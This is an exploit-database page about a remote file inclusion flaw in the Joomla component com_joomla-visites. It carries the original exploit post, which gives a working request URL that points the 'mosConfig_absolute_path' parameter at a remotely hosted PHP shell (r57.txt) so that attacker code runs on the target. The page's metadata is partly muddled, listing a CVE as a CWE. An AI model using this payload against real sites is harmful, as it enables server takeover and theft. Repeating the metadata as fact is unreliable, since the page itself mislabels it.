header-logo
Suggest Exploit
vendor:
Joomla
by:
Li0n-PaL
9,3
CVSS
HIGH
Remote File Inclusion (RFI)
98
CWE
Product Name: Joomla
Affected Version From: Prior to Joomla 1.5.20
Affected Version To: Prior to Joomla 1.5.20
Patch Exists: YES
Related CWE: CVE-2010-1885
CPE: a:joomla:joomla
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2010

Joomla Component(com_joomla-visites) RFI

A Remote File Inclusion (RFI) vulnerability exists in the Joomla Component com_joomla-visites, which allows an attacker to include a remote file, such as a malicious PHP script, by manipulating the 'mosConfig_absolute_path' parameter. This vulnerability affects versions prior to Joomla 1.5.20. Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to Joomla 1.5.20 or later.
Source

Exploit-DB raw data:

==========================================================
Joomla Component(com_joomla-visites) RFI
===========================================================
 
                                          Pal-Li0ns Cr3w , HacKTeach LoverzZ
                                                                                          
+===================================================================================+
[?]Joomla Component(com_joomla-visites) RFI
+===================================================================================+
    [?] My home:              [HacKTeach.org & Pal-Li0ns.com           ]
    [?] For Ask:              [F5w@hotmail.com                         ]
    [?] Script:               [     joomla                             ]
    [?] home Script           [ http://www.joomla.it                   ]
    [?] Language:             [ PHP                                    ]
    [?] Founder:              [ Li0n-PaL                               ]
    [?] Greatz to:            [ Pal-Li0n - Red-D3v1L - ShaDow-D3v1L - Cold-z3ro - storm - Mr.NJ -]
 
===[ Exploit  ]===
http://localhost//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=[shell.txt?]
 
DeMo ~
 
http://www.site.com//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.site.com/r57.txt?
 
 
EnJoY o_O
 
---------------------------------------------------------
 
./exit

Navigation

Suggest Exploit

Services By CQR